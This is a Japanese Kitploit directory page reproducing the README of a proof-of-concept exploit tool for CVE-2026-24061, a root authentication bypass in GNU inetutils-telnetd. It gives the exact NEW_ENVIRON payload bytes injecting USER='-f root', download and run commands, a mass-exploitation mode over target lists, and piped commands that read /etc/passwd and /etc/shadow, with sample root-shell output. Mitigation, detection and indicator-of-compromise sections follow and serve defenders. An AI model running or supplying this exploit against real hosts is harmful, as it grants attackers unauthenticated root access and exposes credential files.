Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — 概念実証: CVE-2026-24061 は、GNU inetutils-telnetd における重大な認証バイパスの脆弱性であり、認証されていないリモート攻撃者が悪意のある NEW_ENVIRON telnet オプションを悪用することで、即座にルートシェルアクセスを取得できるようになります。 | Kitploit
ツール/GitHubGitHub/sh4den/cve-2026-24061
特権昇格脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテストコマンド&コントロール認証論文と研究学習と教育リモートアクセスツール
GitHubsh4den/cve-2026-24061

CVE-2026-24061

6132ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概念実証: CVE-2026-24061 は、GNU inetutils-telnetd における重大な認証バイパスの脆弱性であり、認証されていないリモート攻撃者が悪意のある NEW_ENVIRON telnet オプションを悪用することで、即座にルートシェルアクセスを取得できるようになります。

リポジトリを見る

CVE-2026-24061

GNU inetutils-telnetd - リモート認証バイパス

CVE-2026-24061 を悪用するためのセキュリティリサーチツールです。これは GNU inetutils-telnetd の重大なリモート認証バイパス脆弱性であり、認証なしで即座に root シェルアクセスを可能にします。


目次

  • 脆弱性の概要
  • 影響を受けるバージョン
  • 技術的分析
  • 前提条件
  • インストール
  • 使用方法
  • 出力リファレンス
  • 悪用手法
  • 緩和策と是正措置
  • 侵害の痕跡(IOC)
  • 法的免責事項
  • 参考文献
  • クレジット

脆弱性の概要

項目値
CVE 識別子CVE-2026-24061
CVSS v3.1 スコア9.8(緊急)
CVSS ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE 分類CWE-88: コマンドにおける引数デリミタの不適切な無害化
ベンダーGNU Project
製品inetutils-telnetd
公開日2026年1月20日
パッチ提供状況未定

概要

GNU inetutils-telnetd バージョン 2.7 以前に、認証されていないリモート攻撃者が認証を完全にバイパスして即座に root シェルアクセスを取得できる重大な脆弱性が存在します。この脆弱性は、NEW_ENVIRON telnet オプションを介して、特別に細工された値 "-f root" を持つ USER 環境変数を注入することで悪用され、すべての認証メカニズムをバイパスします。

影響評価

  • 機密性: システムデータの完全な侵害
  • 完全性: root 権限によるシステム全体の制御
  • 可用性: システム全体の乗っ取りまたはサービス拒否の可能性
  • スコープ: 変更なし - 悪用は脆弱な telnet サービスのみに影響

影響を受けるバージョン

バージョン範囲ステータス
<= 2.7脆弱
> 2.7パッチ状況未定

技術的分析

脆弱性の根本原因

この脆弱性は、telnetd の NEW_ENVIRON オプションハンドラにおける USER 環境変数の不適切な検証に起因します。NEW_ENVIRON telnet オプションを処理する際、telnetd サービスは USER 変数の値を login プロセスに渡す前にサニタイズしません。攻撃者が USER を "-f root" に設定することで、資格情報を必要とせずに root ユーザーの認証を強制的に成功させるコマンドライン引数を注入します。

攻撃ベクトル

  1. 攻撃者が telnetd サービス(通常ポート 23)に接続する
  2. telnet オプション交渉中に、サーバーが NEW_ENVIRON データを要求する
  3. 攻撃者が USER 環境変数を "-f root" に設定して応答する
  4. 悪意のある引数が認証チェックをバイパスする
  5. パスワードプロンプトなしで即座に root シェルが付与される
  6. システム全体の侵害が達成される

悪用の複雑さ

  • 前提条件: 対象の telnetd サービスへのネットワークアクセス
  • 認証: 不要
  • ユーザー操作: なし
  • 攻撃の複雑さ: 低

前提条件

システム要件

  • Python 3.7 以上
  • 対象の telnetd インスタンスへのネットワーク接続
  • Python スクリプトを実行するための十分な権限

依存関係

すべての依存関係は Python の標準ライブラリに含まれています:


インストール

方法 1: Git を使用

root@kitploit:~
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

方法 2: 直接ダウンロード

root@kitploit:~
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

方法 3: 手動インストール

root@kitploit:~
# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

使用方法

コマンドラインインターフェース

root@kitploit:~
Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

単一ターゲットの悪用

単一の telnetd インスタンスを悪用します:

root@kitploit:~
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

コマンド実行モード

コマンドを非対話的に実行します:

root@kitploit:~
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

複数ターゲットの一括悪用

ファイルから複数のターゲットを一括で悪用します:

root@kitploit:~
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

ターゲットファイル形式 (targets.txt):

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

注記:

  • 1 行に 1 ターゲット
  • IP アドレスまたはホスト名
  • 空行は無視されます
  • ターゲットはスレッディングを使用して並行して悪用されます

出力リファレンス

ステータスインジケーター

出力例

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

悪用手法

Telnet プロトコル交渉プロセス

このエクスプロイトは telnet プロトコルの交渉フェーズを活用します:

  1. 初期接続: 対象ポートへの TCP 接続を確立
  2. オプション交渉: サーバーが様々な telnet オプションに対して DO/WILL コマンドを送信
  3. TTYPE 合意: クライアントが端末タイプの送信に同意(WILL TTYPE)
  4. TSPEED 合意: クライアントが端末速度の送信に同意(WILL TSPEED)
  5. NEW_ENVIRON 合意: クライアントが環境変数の送信に同意(WILL NEW_ENVIRON)
  6. サブネゴシエーション: サーバーが環境変数を要求(SB NEW_ENVIRON SEND)
  7. ペイロード注入: クライアントが NEW_ENVIRON 応答で USER="-f root" を送信
  8. 認証バイパス: サーバーが悪意のある USER 変数を処理
  9. シェルアクセス: 認証なしで root シェルが付与

ペイロード構造

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

対話型セッション処理

  • 入力多重化: ソケットと標準入力の同時監視に select.select() を使用します
  • 非ブロッキング I/O: ソケットは非ブロッキング操作用に構成されます
  • Telnet 処理: 表示をクリーンにするため、出力から IAC シーケンスを除去します
  • タイムアウト管理: コマンド実行のタイムアウトは 30 秒です

緩和策と是正措置

即時対応

  1. telnetd の無効化: telnetd サービスを直ちに停止して無効化します

    root@kitploit:~
    # systemd-based systems
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # xinetd-based systems
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. ファイアウォールルール: ファイアウォールレベルで telnet ポート(23)をブロックします

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. ネットワーク分離: インターネットに公開されたシステムから telnet サービスを削除します

    • 内部ネットワークセグメントのみで使用
    • ネットワークアクセス制御リスト(ACL)を実装

長期的な推奨事項

代替ソリューション

telnet の代わりに SSH を使用:

root@kitploit:~
# Install OpenSSH server
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd

緩和後の検証

root@kitploit:~
# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# Should return no results if properly disabled

侵害の痕跡(IOC)

ログ分析

システムログで以下のパターンを確認してください:

認証ログ:

root@kitploit:~
# Check for unusual login patterns
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Look for suspicious USER environment variables
sudo grep "USER.*-f" /var/log/auth.log

ネットワークログ:

  • 予期しない IP アドレスからの telnet 接続
  • 通常の運用時間外のポート 23 への接続
  • telnet サービスへの複数の高速接続

システムアーティファクト

  • root として実行されている予期しないプロセス
  • 変更されたシステム設定ファイル
  • 承認されていないユーザーアカウント
  • /root/.ssh/authorized_keys 内の新しい SSH キー
  • 疑わしい cron ジョブまたはスケジュールされたタスク

ネットワークインジケーター

  • telnet サービスプロセスからの送信接続
  • 外部ホストへのデータ窃取
  • リバースシェル接続
  • 侵害されたシステムから発信されるポートスキャン活動
  • 他の内部システムへの横移動の試み

検出コマンド

root@kitploit:~
# Check for active telnet connections
sudo netstat -antp | grep :23

# Review recent root logins
sudo last | grep root

# Check for modified system files
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# List processes by root
sudo ps aux | grep root

# Check for unauthorized SSH keys
sudo cat /root/.ssh/authorized_keys

法的免責事項

重要:使用前にお読みください

このツールは以下の目的にのみ厳密に提供されます:

  • 承認されたセキュリティ評価およびペネトレーションテスト
  • 管理された環境での教育および研究目的
  • 適切な認可を得た防御的セキュリティ運用
  • 所有している、またはテストする明示的な許可を得ているシステムの脆弱性評価

禁止されている用途:

  • コンピュータシステムまたはネットワークへの不正アクセス
  • 所有者の明示的な書面による同意なしのシステムの悪用
  • 地域、州、連邦、または国際法に違反するいかなる活動
  • 悪意のある活動または不正なシステム侵害

責任: 本ソフトウェアの著者、貢献者、および配布者は、このツールを使用して行われた誤用、損害、または違法行為について一切の責任を負いません。ユーザーは単独で以下の責任を負います:

  • 適用されるすべての法律および規制への準拠を確保すること
  • セキュリティテストを実施する前に適切な認可を取得すること
  • 本ソフトウェアの使用または誤用から生じるすべての結果

法的通知: コンピュータシステムへの不正アクセスは重大な刑事犯罪です。違反した場合、以下の法律に基づいて起訴される可能性があります:

  • コンピュータ詐欺及び不正使用取締法(CFAA)- 米国(18 U.S.C. § 1030)
  • コンピュータ不正使用法 1990 - 英国
  • 情報システムへの攻撃に関する欧州連合指令
  • 世界各国の他の法域における同様の法律

罰則には、懲役、多額の罰金、および民事責任が含まれる場合があります。

このツールを使用することにより、本免責事項および適用されるすべての法律を読み、理解し、遵守することに同意したものとみなされます。


参考文献

公式リソース

  • GNU Inetutils ホームページ
  • GNU Inetutils ドキュメント

脆弱性情報

  • NVD - CVE-2026-24061
  • MITRE CVE レコード
  • OpenWall 公開情報(2026年1月20日)
  • OpenWall ディスカッション(2026年1月20日)
  • OpenWall 更新情報(2026年1月22日)

関連ドキュメント

  • CWE-88: コマンドにおける引数デリミタの不適切な無害化
  • Telnet プロトコル仕様(RFC 854)
  • Telnet 環境オプション(RFC 1408)
  • OWASP コマンドインジェクション

セキュリティのベストプラクティス

  • NIST リモートアクセスガイドライン
  • CIS ベンチマーク
  • SANS セキュリティリソース

クレジット

  • エクスプロイト作者: IRIS C2 Team
  • フレームワーク: HGrab フレームワークの一部
  • 発見: セキュリティリサーチコミュニティ
  • 公開: OpenWall メーリングリストの貢献者

変更履歴

バージョン日付変更内容
1.0.02026-01-23初回リリース

サポートと連絡先

質問、問題、または貢献については:

  • 課題: GitHub Issues でバグを報告するか、機能をリクエストしてください
  • セキュリティ: 脆弱性は責任を持ってメンテナーに報告してください
  • 貢献: プルリクエストを歓迎します

ライセンス

このプロジェクトは、承認されたセキュリティ研究および教育目的のためだけに現状のまま提供されます。明示的または黙示的な保証は一切ありません。自己責任で、適用されるすべての法律および規制に従って使用してください。

適切な認可がある場合のみ使用してください

ツールをダウンロード
パッケージ
用途
socketネットワーク通信
selectI/O 多重化
sysシステム連携
osオペレーティングシステムインターフェース
threading並行ターゲット悪用
datetimeタイムスタンプのフォーマット
インジケーター色説明
[SUCCESS]緑ターゲットへの接続に成功
[EXPLOIT]緑悪用ペイロードの送信に成功
[INFO]青現在の操作に関する情報メッセージ
[ERROR]赤接続失敗、タイムアウト、または悪用エラー
[WARNING]黄警告メッセージ(現在は未使用)
対策優先度説明
SSH への移行緊急リモートアクセス用に telnet を SSH に置き換える
パッチ管理緊急セキュリティ更新を監視して適用する
サービス監査高不要なネットワークサービスを特定して無効化する
ネットワークセグメンテーション高重要なシステムを公開ネットワークから分離する
侵入検知中悪用の試行を検出するために IDS/IPS を導入する
アクセス制御中リモートサービスに IP ホワイトリストを実装する